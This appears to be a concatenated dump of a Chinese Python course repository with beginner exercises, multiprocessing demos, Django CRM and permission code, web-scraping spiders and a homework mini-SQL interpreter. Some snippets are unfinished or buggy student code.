计算index 和 manager的执行时间 <file_sep>/day9/socket_server.py import time import socketserver class Myserver(socketserver.BaseRequestHandler): def handle(self): self.data=self.request.recv(1024).strip() self.data=self.r print(self.data) myserver=socketserver.ThreadingTCPServer(('127.0.0.1',9000),Myserver) myserver.serve_forever() <file_sep>/day19/form/app01/models.py from 
django.db import models # Create your models here. # Create your models here. class Publisher(models.Model): name=models.CharField(max_length=32,unique=True,verbose_name="出版社名字") # 字段显示中文需要用verbose_name address=models.TextField(verbose_name="出版社地址") def __str__(self): # 页面显示详细信息需要写这个 return self.name class Meta: # 表名显示中文 verbose_name="出版社" verbose_name_plural=verbose_name # 复数的意思,如果不加这个后面会多个s class Author(models.Model): name=models.CharField(max_length=12) gender=models.SmallIntegerField( choices=((0,"女"),(1,"男"),(2,"保密")), default=2 ) age=models.IntegerField() def __str__(self): return self.name class Meta: verbose_name="作者" verbose_name_plural = verbose_name class Book(models.Model): title=models.CharField(max_length=32,unique=True) publisher_date=models.DateField(auto_now_add=True) phone=models.CharField(max_length=11,unique=True,null=True,blank=True) # blank可以不填 publisher=models.ForeignKey(to="Publisher",on_delete=models.CASCADE) # 外键 authors=models.ManyToManyField(to="Author") # 多对多 def __str__(self): return self.title class Meta: verbose_name = "书名" verbose_name_plural = verbose_name<file_sep>/day2/01str.py s = 'python自动化21期' # 切片 #s[起始索引:结束索引+1:步长] # s1 = s[:6] # print (s1) # # s2 = s[6:9] # print (s2) # print(s[0:]) ##默认到最后 # # print (s[:-1]) ##-1代表最后一个,但是不打印最后一个 # # print (s[0:5:2]) ##每隔1个打印一次 2 就代表步长 # print (s[5:0:-2]) ##反向加步长,倒着取值 # s = 'oldBoy' # * capitalize()首字母大写,其他字母小写 s1 = s.capitalize() # print (s1) # # *** 全部大写upper() 全部小写lower() s2 = s.upper() s3 = s.lower() print (s2,s3) #例子 输入验证码不区分大小写 # code = 'Qear'.lower() # your_cold=input('请输入验证码:') # if your_cold == code: # print ('验证成功') # else: # print ('验证不成功') #* 大小写反转 swapcase() s4 = s.swapcase() print (s4) #*非字母的元素隔开的每个单词首字母大写 title() ss = '<NAME>*oldboy3taibia' s5 = ss.title() print (s5) # center 居中,长度自己设定,默认填充物None s6 = s.center(30,'*') print (s6) # *** startswith endswith 以什么开头,以什么结尾 s7 = s.startswith('o') print (s7) ##如果是真,则返回true s8 = s.endswith('y') print (s8) ##同上 # *** strip 
去除首尾的空格,制表符\t,换行符。不仅仅是去除空格.... # rstrip 去除右边,lstrip 去除左边 s = 'tyoyldBoyrte' # # print(s) # s8 = s.strip() # print(s8) # s81 = s.strip('t') # # print(s81) # s81 = s.strip('tey') ##把字符串里面的tey给去掉了,从左往右依次执行 # print(s81) #例子: # name = input('>>>').strip() ##输入用户名的时候自动去除空格,可以防止用户输错 # if name == 'oldboy': # print('验证成功') #*** split (str ---> list) # s1 = 'oldboy,wusir,alex' # b = 'oldboywusiroalex' # l = b.split() # print(l) # l = s1.split(',') ##以逗号为分隔符,让s1变成了列表 # print(l) # l2 = b.split('o') # ['', 'ldb', 'ywusir', 'alex']b # print(l2) # # l3 = b.split('o',1) # ['', 'ldboywusiroalex'] # print(l3) #join 将list --->str sa = 'oldBoy' s9 = '+'.join(sa) ##用‘+’号把字符串连接起来 print(s9) l1 = ['oldboy','wusir','alex'] s91 = '_'.join(l1) ##用'_'把字符串连接起来 print(s91) # #replace 替换 h = '我们都是好孩子' h1 = h.replace('我','你') print(h1) #find 通过元素找索引 找不到返回-1 # index 通过元素找索引 找不到报错 u = 'odlabced' u1 = u.find('g') print(u1) # u2 = u.index('g') # print (u2) ##字符串格式化输出format # res='我叫{}今年{}岁,爱好{}'.format('egon',18,'male') # print(res) res='我叫{0}今年{1}岁,爱好{2},我依然叫{0}'.format('egon',18,'male') print(res) # res='{name} {age} {sex}'.format(sex='male', name='egon', age=18) # print(res) ##公共方法 #len count n = 'dfdfdfdfsdfsf' n1=len(n) print (n1) ##返回字符串的长度 n2 = n.count('d') ##统计字母d出现了几次 print (n2) ##判断字符串的类型 name = 'jinxin989' print (name.isalnum()) ## 判段字符串由字母或数字组成 print (name.isdigit()) ##是否只有字母 print (name.isalpha()) ##是否只有数字 #例子 i = '123a' if i.isdigit(): i = int(i) else: print("输入有误...") <file_sep>/day1/作业.py # name = input ('请输入你的姓名:') # sex = input ('请输入你的性别:') # print ('我的名字是' +name ,'我的性别是' +sex) # a = '你好,' # b = '朋友' # c = a + b # print(c) # name = input('请输入你的名字:') # age = input('请输入你的年龄:') # job = input('请输入你的工作:') # hobby = input('请输入你的爱好:') # msg1 = ''' ------------ info of %s ----------- # Name : %s # Age : %d # job : %s # Hobbie: %s # ------------- end ----------------- # ''' % (name,name,int(age),job,hobby) # print(msg1) # #1 一个条件 # if 2 > 1 : # print(666) # # # #2 一个条件两种结果 # if 2 < 1: # 
print(666) # else: # print(555) # # #3 多种条件选一个结果 # num = int(input('猜一下数字:')) # if num == 6: # print('请你吃饭') # elif num == 3: # print('请你喝酒') # elif num == 1: # print('请你唱歌') # #4 多种条件必选一个结果 # num = int(input('猜一下数字:')) # if num == 6: # print('请你吃饭') # elif num == 3: # print('请你喝酒') # elif num == 1: # print('请你唱歌') # else: # print('没机会了.....') # while True: # print('凉凉') # print('黄昏') # print('我有一个道姑朋友') #打印1到100,当小于等于100的时候可以一直打印,否则就退出 # count = 1 # while count <= 100: # print(count) # count = count + 1 ##打印1到100的数字之和 # count = 0 # sum = 1 # while count <101: # # sum=sum+count # count += 1 # # print (sum) # while True: # print(333) # print(5455) # print(222) # break # print(888) # print(666) # while True: # print(333) # print(5455) # print(222) # continue # print(888) # print(666) # count = 1 # while count < 5: # print(count) # count += 1 # else: # print('循环正常完毕') # s = 'fdsanmnxfdfd' # for i in s: # if i == 'a':pass # print(i) # else: # print(666) #练习 #使用while循环输入 1 2 3 4 5 6 8 9 10 # i = 0 # while i <10: # # i+=1 # if i ==7: # continue # # # print (i) #输出 1-100 内的所有偶数 # i = 0 # while i<101: # if i%2==0: # print (i) # i+=1 #输出1-100内的奇数 # i = 0 # while i<101: # if i%2!=0: # print (i) # i+=1 #求1-2+3-4+5 ... 
99的所有数的和 奇数和偶数 # i=0 # sum=0 # while i < 100: # if i%2==0 : # sum=sum+i # #print (sum) # i+=1 # else: # sum=sum-i # i+=1 # #print (sum) # print (sum) # # # # # li = [{'username':'alex','password':'SB'}, # {'username':'wusir','password':'sb'}, # {'username':'taibai','password':'123'},] # a=0 # b=0 # while a < 3: # # username = input("请输入你的用户名:") # passwd = input("请输入你的密码:") # for i in li: # # if username == i['username'] and passwd == i['password']: # print('登录成功') # exit() # else: # print("登录失败请重新登录") # a += 1 # b += 1 # if a == 3:##当第一次的机会用完之后,在给她三次机会 # a=0 # if b == 6: ##当b=6的时候就已经循环了两次,所有退出占整个循环 # print ("你的六次机会已经全部用完,拜拜!") # break # m=input("还可以给你三次机会,请输入Y:") # if m=="Y": # continue # else: # print ("臭不要脸,你已经放弃了在玩三次的机会。") # break # <file_sep>/day27/s21crm/crm/views/depart.py from django.shortcuts import render, redirect from crm import models from crm.forms.depart import DepartModelForm from django.urls import reverse def depart_list(request): """ 部门列表 :param request: :return: """ queryset = models.Department.objects.all() return render(request, 'depart_list.html', {'queryset': queryset}) def depart_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = DepartModelForm() return render(request, 'depart_add.html', {'form': form}) form = DepartModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('depart_list') else: return render(request, 'depart_add.html', {'form': form}) def depart_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.Department.objects.filter(id=nid).first() if request.method == "GET": form = DepartModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'depart_edit.html', {"form": form}) form = DepartModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('depart_list') else: return render(request, 'depart_edit.html', {"form": form}) def depart_del(request,nid): """ 删除用户 :param request: 
:param nid: :return: """ models.Department.objects.filter(id=nid).delete() return redirect('depart_list') <file_sep>/day26/scrapy框架/choutiall/choutiall/spiders/chouti.py # -*- coding: utf-8 -*- import scrapy from choutiall.items import ChoutiallItem class ChoutiSpider(scrapy.Spider): name = 'chouti' # allowed_domains = ['www.xxx.com'] start_urls = ['https://dig.chouti.com/r/pic/hot/1'] # 设计一个所有页码通用的url url='https://dig.chouti.com/r/pic/hot/%d' pageNum=1 def parse(self, response): div_list = response.xpath('//div[@class="content-list"]/div') for div in div_list: title = div.xpath('./div[3]/div[1]/a/text()').extract_first() item = ChoutiallItem() # 实例化items item['title'] = title # 列表形式 yield item # 进行其他页码对应url的请求操作 if self.pageNum <= 120: self.pageNum += 1 url = format(self.url % self.pageNum) # print(url) # 进行手动请求的发送 yield scrapy.Request(url=url, callback=self.parse) #调用上面的parse方法去解析所有的页面 <file_sep>/day22/new/app01/views.py from django.shortcuts import render, HttpResponse, redirect from django.conf import settings from rbac.service.permission import init_permission from rbac.models import UserInfo # Create your views here. 
def login(request): if request.method == "POST": username = request.POST.get("username") pwd = request.POST.get("password") user_obj = UserInfo.objects.filter(username=username, password=pwd).first() if user_obj: # 登录成功 # 初始化权限信息 init_permission(request, user_obj) return redirect("/book_list/") return render(request, "login.html") def book_list(request): return render(request, "book_list.html") def book_add(request): return render(request, "book_add.html") <file_sep>/day9/进程/数据共享.py from multiprocessing import Manager,Process,Lock #manager 可以实现数据共享 (不重要) def work(d,lock): with lock: #锁的简写 d['count']-=1 if __name__ == '__main__': lock=Lock() m=Manager() dic=m.dict({'count':100}) l=[] for i in range(10): p=Process(target=work,args=(dic,lock,)) l.append(p) p.start() for p in l: p.join() print(dic) <file_sep>/day9/进程/进程池.py #提交任务的两种方式: #同步调用:提交完任务后,就在原地等待,等待任务执行完毕,拿到任务的返回值,才能继续下一行代码,导致程序串行执行 #异步调用+回调机制:提交完任务后,不在原地等待,任务一旦执行完毕就会触发回调函数的执行, 程序是并发执行 import time from concurrent.futures import ProcessPoolExecutor import random,os # def func(num): # print(num) # time.sleep(1) # print(num) # if __name__ == '__main__': # t=ProcessPoolExecutor(20)#开启20个进程 # for i in range(50): # t.submit(func,i) # t.shutdown() # print('done') #同步调用 def task(n): print('%s is runing'%os.getpid()) time.sleep(random.randint(1,3)) return n**2 def handle(res): print('handle res %s' %res) if __name__ == '__main__': pool=ProcessPoolExecutor(3) for i in range(5): res=pool.submit(task,i).result() handle(res) pool.shutdown() print('主') #异步调用 # def task(n): # print('%s is runing'%os.getpid()) # time.sleep(random.randint(1,3)) # return n**2 # def handle(res): # res=res.result() # print('handle res %s' %res) # if __name__ == '__main__': # pool=ProcessPoolExecutor(2) # for i in range(5): # obj=pool.submit(task,i) # obj.add_done_callback(handle) # # pool.shutdown() # print('主') <file_sep>/day25/homework/校花网作业/爬取校花网图片.py import requests from lxml import etree import os path = 
r'D:\python21\python\day25\homework\校花网作业' # 获取url url = 'http://www.521609.com/daxuemeinv/list%s.html' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', } # 创建文件夹 if not os.path.exists('img'): os.mkdir('img') for page in range(81, 824): print('正在下载第%d页图片' % page) new_url = format(url % page) # print(new_url) response = requests.get(url=new_url, headers=headers) page_text = response.text # 实例化一个etree对象,并且将页面数据放到etree tree = etree.HTML(page_text) div_list = tree.xpath('//div[@class="index_img list_center"]/ul//li') # print(div_list) # 写入到文件 for div in div_list: img_url = div.xpath('//div[@class="index_img list_center"]//li/a//@src') # print(img_url) for eve_url in img_url: img_full_url = 'http://www.521609.com' + eve_url img_data = requests.get(url=img_full_url, headers=headers,timeout = 500).content img_name = img_full_url.split('/')[-1] img_path = 'img/' + img_name with open(img_path, 'ab')as f: f.write(img_data) <file_sep>/day17/lianxi/app01/migrations/0002_person.py # -*- coding: utf-8 -*- # Generated by Django 1.11.9 on 2018-08-13 13:16 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app01', '0001_initial'), ] operations = [ migrations.CreateModel( name='Person', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=22)), ('age', models.IntegerField()), ('birthday', models.DateField()), ('birthday2', models.DateTimeField(null=True)), ('phone', models.CharField(max_length=11, unique=True)), ('join_date', models.DateField(auto_now_add=True)), ('last_date', models.DateField(auto_now=True)), ], ), ] <file_sep>/day19/form之前/app01/views.py from django.shortcuts import render,redirect from app01 import models # Create your views here. 
def book_list(request): book_obj=models.Book.objects.all() return render(request,"book_list.html",{"book_obj":book_obj}) def add_book(request): if request.method=="GET": publisher_list=models.Publisher.objects.all() author_list=models.Author.objects.all() return render(request,"add_book.html",{"publisher_list":publisher_list,"author_list":author_list}) else: title=request.POST.get("title") publish_data=request.POST.get("publish_date") phone=request.POST.get("phone") publisher=request.POST.get("publisher") authors=request.POST.getlist("authors") #去数据库创建 book_obj=models.Book.objects.create( title=title, publisher_date=publish_data, publisher_id=publisher, ) book_obj.authors.add(*authors) return redirect("/book_list/") def edit_book(request,pk): book_obj = models.Book.objects.filter(id=pk).first() if request.method=="POST": title = request.POST.get("title") publish_data = request.POST.get("publish_date") phone = request.POST.get("phone") publisher = request.POST.get("publisher") print(publisher) authors = request.POST.getlist("authors") book_obj.title=title book_obj.publish_date=publish_data book_obj.phone=phone book_obj.publisher_id=publisher book_obj.save() book_obj.authors.set(authors) return redirect("/book_list/") else: publisher_list=models.Publisher.objects.all() author_list=models.Author.objects.all() return render(request,"edit_book.html",locals())<file_sep>/day23/auto - 2 - 固定二级菜单示例/web/templates/userlist.html {% extends 'layout.html' %} {% block js %} <link rel="stylesheet" href="../static/plugins/bootstrap/css/bootstrap.min.css"> {% endblock %} {% block content %} <div class="panel panel-success"> <div class="panel-heading">用户列表</div> <div class="panel-body"> <table class="table table-hover"> <tr> <th>序号</th> <th>用户名</th> <th>操作</th> </tr> {% for user in user_list %} <tr> <td>{{ forloop.counter }}</td> <td>{{ user.name }}</td> <td> <a class="btn btn-warning" href="/web/del_user/{{ user.id }}">删除</a> <a class="btn btn-info" href="/web/edit_user/{{ user.id 
}}">编辑</a> </td> </tr> {% endfor %} </table> <a class="btn btn-info" href="/web/add_user/">添加用户</a> </div> </div> <!-- --> {% endblock %}<file_sep>/day4/ceshi.py ##查询语句 # select id ,name, age from userinfo where age>22 # select * from userinfo where age>22 # select * from userinfo where age=25 # select * from userinfo where phone like 133 # ##下面这个不行 # select * from userinfo where job=IT ##更改语句 # update name='bob' from userinfo where age=25 # cmd = 'select * from userinfo' # a = cmd.split('from')[0].split()[1:] # if a==['*']: # print('ok') # else: # print('bad') # left_yuju="update age=35 from userinfo where name=wusir" # filter_cols = left_yuju.split('from')[0].split()[1].split('=') # res = [i.strip() for i in filter_cols] # print(filter_cols) # print(res) # b = ','.join(filter_cols) # print(b.strip()) #删除 #delete name=wusir from userinfo where age=35 # with open("userinfo","r",encoding="utf-8") as f: # lines = f.readlines() # # with open("userinfo","w",encoding="utf-8") as f2: # for line in lines: # if "wusir" in line: # continue # f2.write # b={'id': ['1', '2', '3'], 'name': ['Alex', 'Egon', 'wusir'], 'age': ['23', '24', '35'], # 'phone': ['13651054608', '13304320533', '1333235322'], 'job': ['IT\n', 'Tearcher\n', 'IT\n']} # # c=b.get('id') # #print(c) # d=b["id"].index('3') ##查出id索引 # c=b.get('name')[d] # print(c) #print(d) # f = b["name"][d]#根据id索引查出name对应的值 # print(b.get('id').pop(d)) # a=b.get('name').pop(d) # print(b.get("age").pop(d)) # print(b.get("phone").pop(d)) # print(b.get('job').pop(d)) # # print(a) # print(b) # print(f) # print(b['age'][d]) ##更新语句 #left_yuju='insert into userinfo id,name,age,phone,job values 8,jack,23,123456789,python' # # filter_index = left_yuju.split('userinfo')[-1].split('values')[:-1] #filter_values=left_yuju.split('values')[-1].split(',') # # print(filter_index,type(filter_index)) #print(filter_values) from tabulate import tabulate new_list=[] with open('userinfo',encoding='utf-8',mode='r') as f1: new_list.append(f1.readline()) 
print(new_list) # print(tabulate(new_list,tablefmt="grid")) # insert into userinfo id,name,age,phone,job values 5,jinxing,43,123456789,python<file_sep>/day26/scrapy框架/pipelinepro/pipelinepro/spiders/qiubai.py #执行方式 ,进入到项目的文件夹下,在执行scrapy crawl qiubai --nolog # -*- coding: utf-8 -*- import scrapy from pipelinepro.items import PipelineproItem class QiubaiSpider(scrapy.Spider): name = 'qiubai' # allowed_domains = ['www.xx.com'] start_urls = ['https://www.qiushibaike.com/'] def parse(self, response): # xpath返回的列表元素类型为Selecor类型 div_list = response.xpath('//div[@id="content-left"]/div') # 声明一个用于存储解析到数据的列表 all_data = [] for div in div_list: # extract()可以将selector对象中存储的文本内容获取 # author = div.xpath('./div[1]/a[2]/h2/text()')[0].extract() author = div.xpath('./div[1]/a[2]/h2/text()').extract_first() content = div.xpath('.//div[@class="content"]/span//text()').extract() content = "".join(content) # 实例化item对象 item = PipelineproItem() # 将解析到的数据值存储到item对象中 item['author'] = author item['content'] = content # 将item对象提交给管道 yield item # 持久化存储方式: # 1.基于终端指令:必须保证parse方法有一个可迭代类型对象的返回 # 2.基于管道: # 1.items.py:对该文件中的类进行实例化操作(item对象:存储解析到的数据值)。 # 2.pipeline.py:管道,作用就是接受爬虫文件提交的item对象,然后将该对象中的数据值进行持久化存储操作 <file_sep>/day4/优秀的作业/优秀的作业/张晶瑜/homework/homework.py import re, time, json, functools import pandas as pd from prettytable import PrettyTable """ 思路: 1.创建SqlSyntax类,初始化数据和字符串,用于处理select、insert、delete、set函数,用于处理字符串获取参数并返回 2.创建SqlHandle类,用于反射上述函数,接收其字符串参数和数据,并执行响应的增删改查函数,添加一些边角料 3.创建TableHandler类,用于执行循环,获取窗口输入的字符串,并调用sql_handler,返回结果 4.创建用户认证类 """ class SqlSyntax(object): """负责增删改查的SQL语句模块""" def __init__(self, ): self.string = "" self.dataSet = "" def select(self): """负责查找语句, 只识别 select **** where ****语句""" if "where" in self.string: par = re.compile(r"select(.+)where", flags=re.S) # 用匹出select和where里的关键字,注意有* str1 = re.match(par, self.string).group(1) condition = self.string.split("where")[-1].strip() else: str1 = self.string.split(" ", 1)[-1] condition = False if "*" in str1: keys = "*" else: 
keys = [r.strip() for r in str1.split(",")] return { "keys": keys, "condition": condition, } def insert(self): """ 负责插入语句, 只识别 insert (name="alex", age="10000") 和 insert("alex", "10000"),必须输入所有的信息""" par = re.compile(".*\((.+)\).*", re.S) # 匹配出insert 后面的内容 str1 = re.match(par, self.string).group(1) if "=" not in str1: # 说明都是元组,'"Alex", "10000"' keys = list(self.dataSet.columns) values = [self.strip(r) for r in str1.split(",")] # 必须除去'"alex"'或者"'alex'"外边的引号 dic = dict(zip(keys, values)) else: # 说明是'name="Alex", age="10000"'这种类型,要去掉双引号 dic = {r.split("=")[0].strip(): self.strip(r.split("=")[1]) for r in str1.split(",")} return dic def set(self): """负责修改语句, 只识别 set name="alex" where 条件""" par = re.compile(r"set(.+)where", flags=re.S) str1 = re.findall(par, self.string)[0] condition = self.string.split("where")[-1].strip() keys = {r.split("=")[0].strip(): self.strip(r.split("=")[1]) for r in str1.split(",")} return { "keys": keys, "condition": condition, } def delete(self): """负责删除语句, 只识别 delet * where id = 3""" condition = self.string.split("where")[-1].strip() return { "condition": condition, } def strip(self, string): return string.strip().strip("'").strip('"') class SqlHandler(SqlSyntax): def __init__(self): super(SqlHandler, self).__init__() self.__func_dict = dict( select=self.__select_handler, insert=self.__insert_handler, set=self.__set_handler, delete=self.__delete_handler, ) def sql_handler(self): try: func = self.string.split(" ", 1)[0] # 找到字符串的第一个字符 dic = getattr(self, func)() data = self.__func_dict[func](dic) # 执行相应的函数 print(self.__table(data)) self.dataSet.to_csv('table.txt', index=None) except Exception as e: self.__log("Error.The syntax is not correct.", e) def __select_handler(self, dic): """根据dic参数执行查询结果""" if dic["condition"]: if dic["keys"] == "*": data = self.__where(dic["condition"]) else: data = self.__where(dic["condition"])[dic["keys"]] else: if dic["keys"] == "*": data = self.dataSet else: data = self.dataSet[dic["keys"]] return data def 
__insert_handler(self, dic): """根据dic参数执行插入结果""" if dic["id"] in list(self.dataSet["id"]): self.__log("The id is already exist. Please input again.") if dic["name"] in list(self.dataSet["name"]): string = str(input("Warning: the name is already exist, surely insert it?")) if string in ["Y", "y", "yes", "YES", ""]: self.dataSet.loc[self.dataSet.shape[0]] = [dic.get(key) for key in list(self.dataSet.columns)] else: self.dataSet.loc[self.dataSet.shape[0]] = [dic.get(key) for key in list(self.dataSet.columns)] return self.dataSet def __set_handler(self, dic): """根据dic参数执行修改结果""" return self.__inset_and_delete(dic, "set") def __delete_handler(self, dic): # index = self.dataSet[self.dataSet["id"].isin(index)].index.tolist() # 删除 return self.__inset_and_delete(dic, "delete") def __where(self, condition): """处理语句""" key = re.match('^[<KEY>]+', condition).group(0) if "like" in condition: value = re.findall('[0-9a-zA-Z]+$', condition)[0] # 找到这个参数 str_v = [str(v) for v in list(self.dataSet[key])] a = [value in v for v in str_v] data = self.dataSet.loc[a, :] else: if "=" in condition: index = condition.index("=") condition = condition[: index] + "=" + condition[index: ] expression = 'self.dataSet["%s"]' % key string = condition.replace(key, expression) data = self.dataSet[eval(string)] return data def __inset_and_delete(self, dic, func_name): msg = self.dataSet.to_dict("records") value = re.findall('[0-9a-zA-Z]+$', dic["condition"])[0] key = re.findall('^[<KEY>', dic["condition"])[0] if func_name == "set": for row in msg: for k, v in dic["keys"].items(): if str(row.get(key)) == value: row[k] = v self.dataSet = pd.DataFrame(msg, columns=self.dataSet.columns) else: msg_new = [] for row in msg: if str(row.get(key)) == value: pass else: msg_new.append(row) self.dataSet = pd.DataFrame(msg_new, columns=self.dataSet.columns) self.dataSet.to_csv(self.table, index=None) return self.dataSet def __table(self, data): table = PrettyTable(list(data.columns)) for i in range(data.shape[0]): 
table.add_row(data.iloc[i, :]) return table def __log(self, *args, **kwargs): print("Log: ", *args, **kwargs) def __call__(self, string, table): self.string = string self.table = table try: self.dataSet = pd.read_csv(self.table, encoding='utf-8', header=0) except IOError: print("The table isn't correct.") def author(f): @functools.wraps(f) def decorator(*args, **kwargs): reader = functools.partial(open, encoding="utf-8", mode="r") file = reader("user.txt") user = [json.loads(line) for line in file.readlines()] count = 0 while True: username = str(input("请输入登录用户: ")) password = str(input("请输入登录密码: ")) if count > 3: break if {"username": username, "password": <PASSWORD>} not in user: print("Username or password not correct. Please try again.") count += 1 else: return f(*args, **kwargs) return decorator class TableHandler(object): """负责执行文件操作""" def __sql_handler(self, handler): while True: yield handler.sql_handler() @author def loop(self, table): """负责循环""" handler = SqlHandler() while True: string = str(input("%s SQL >>> " % time.strftime("%Y-%m-%d %X", time.localtime()))) handler(string, table) next(self.__sql_handler(handler)) if __name__ == '__main__': tb = TableHandler() tb.loop('table.txt') <file_sep>/day6/序列化.py # import pickle # # obj = ('北京','昌平沙河') # # # 序列化到文件 # with open("file","wb")as f: # pickle.dump(obj,f) # f.close() # # # #读取文件 # df = open('file','rb') # read = pickle.load(df) # df.close() import json f=open('file','w') a={'name':'北京','place':'昌平沙河'} json.loads(a,f,ensure_ascii=False) # ret = json.dumps(a,ensure_ascii=False) # print(ret)<file_sep>/day24/auto - 12 - 权限粒度控制到按钮/rbac/templatetags/rbac.py from django.template import Library from django.conf import settings register = Library() @register.filter def permission(name,request): # 权限相关的 if name in request.session.get(settings.RBAC_PERMISSION_SESSION_KEY): return True @register.inclusion_tag('rbac/menu.html') def get_menu(request): # 菜单相关 """ 动态生成二级菜单 :param request: :return: """ menu_dict = 
request.session.get(settings.RBAC_MENU_SESSION_KEY) # 去session里面获取菜单信息 """ { 1: { 'title': '用户管理', 'icon': 'fa-clipboard', 'class':'', 'children': [ {'title': '用户列表', 'url': '/app01/user/', 'name': 'user_list','class':'active'} ] }, 2: { 'title': '商品管理', 'icon': 'fa-clipboard', 'class':'hide', 'children': [ {'title': '订单列表', 'url': '/app01/order/', 'name': 'order'}, {'title': '个人中心', 'url': '/app01/certer/', 'name': 'center'} ] } } """ for k,v in menu_dict.items(): for child in v['children']: name = child['name'] if request.default_selected_menu_name == name: child['class'] = 'active' # 菜单默认被选中,并显示 v['class'] = '' return {'menus': list(menu_dict.values()) }<file_sep>/day2/作业终版购物车.py #博客地址 http://www.cnblogs.com/huningfei/ goods = [{"name": "电脑", "price": 1999}, {"name": "鼠标", "price": 10}, {"name": "游艇", "price": 20}, {"name": "美女", "price": 998},] shopping_list = [] money = int(input("请输入你的金额:").strip()) print("商品列表") while True: for i in range (len(goods)): print(i,goods[i]["name"],goods[i]["price"]) ##打印商品列表 num = input("请输入你想购买的商品ID,退出请按q:").strip() if not num: print("请重新输入:") continue if num.isdigit(): num = int(num) buy_num = input("请输入你想要购买的个数:").strip() if not buy_num: print ("请重新输入数字:") continue if buy_num.isdigit(): buy_num = int(buy_num) if (goods[num]["price"] * buy_num) < money: ##如果价钱小于你的金额就购买成功 print ("你已经购买成功") a = 1 while a <= buy_num: ##循环购买的个数,然后加入到新的列表里面 shopping_list.append({"name": goods[num]["name"],"price": goods[num]["price"],"num":buy_num}) print(shopping_list) a += 1 money = money - (goods[num]["price"] * buy_num) ##计算余额 价钱乘以个数 print("余额: %s" %(money)) choice = input("你还想继续购买吗,请按y,否则请按q:").strip() if choice == "y" or choice == "Y": continue else: ##如果不想购买则打印订单和消费金额 money = 0 for j in range(len(shopping_list)): ##去循环新的列表 print ("订单%s: %s %s元" % (j+1,shopping_list[j]["name"],shopping_list[j]["price"])) money = money + shopping_list[j]["price"] print("一共消费:%s" % (money)) break else: print("余额不足") if num == "q" or num == "Q": 
print("你没有购买任何商品,谢谢光临!") break <file_sep>/day27/s21crm/crm/views/school.py from django.shortcuts import render, redirect from crm import models from crm.forms.school import SchoolModelForm from django.urls import reverse def school_list(request): """ 部门列表 :param request: :return: """ queryset = models.School.objects.all() return render(request, 'school_list.html', {'queryset': queryset}) def school_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = SchoolModelForm() return render(request, 'school_add.html', {'form': form}) form = SchoolModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('school_list') else: return render(request, 'school_add.html', {'form': form}) def school_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.School.objects.filter(id=nid).first() if request.method == "GET": form = SchoolModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'school_edit.html', {"form": form}) form = SchoolModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('school_list') else: return render(request, 'school_edit.html', {"form": form}) def school_del(request, nid): """ 删除用户 :param request: :param nid: :return: """ models.School.objects.filter(id=nid).delete() return redirect('school_list') <file_sep>/day27/s21crm/s21crm/urls.py """s21crm URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.11/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url from django.contrib import admin from crm.views import depart from crm.views import userinfo from crm.views import course from crm.views import school from crm.views import classes from crm.views import public from crm.views import private from crm.views import login from crm.views import logout from crm.views import record from rbac.views import menu from rbac.views import permission from rbac.views import role urlpatterns = [ url(r'^admin/', admin.site.urls), url(r'^login/', login.login, name="login"), url(r'^logout/', login.logout, name="logout"), url(r'^index/', login.index, name="index"), # 部门 url(r'^depart/list/', depart.depart_list, name='depart_list'), url(r'^depart/add/', depart.depart_add, name='depart_add'), url(r'^depart/edit/(\d+)', depart.depart_edit, name='depart_edit'), url(r'^depart/del/(\d+)', depart.depart_del, name='depart_del'), # 用户 url(r'^user/list/', userinfo.user_list, name='user_list'), url(r'^user/add/', userinfo.user_add, name='user_add'), url(r'^user/edit/(\d+)/', userinfo.user_edit, name='user_edit'), url(r'^user/del/(\d+)/', userinfo.user_del, name='user_del'), # 课程 url(r'^course/list/', course.course_list, name='course_list'), url(r'^course/add/', course.course_add, name='course_add'), url(r'^course/edit/(\d+)/', course.course_edit, name='course_edit'), url(r'^course/del/(\d+)', course.course_del, name='course_del'), # 学校 url(r'^school/list/', school.school_list, name='school_list'), url(r'^school/add/', school.school_add, name='school_add'), url(r'^school/edit/(\d+)', school.school_edit, name='school_edit'), url(r'^school/del/(\d+)', school.school_del, name='school_del'), # 班级 url(r'^classes/list/', classes.classes_list, name='classes_list'), url(r'^classes/add/', classes.classes_add, name='classes_add'), url(r'^classes/edit/(\d+)', classes.classes_edit, name='classes_edit'), url(r'^classes/del/(\d+)', classes.classes_del, 
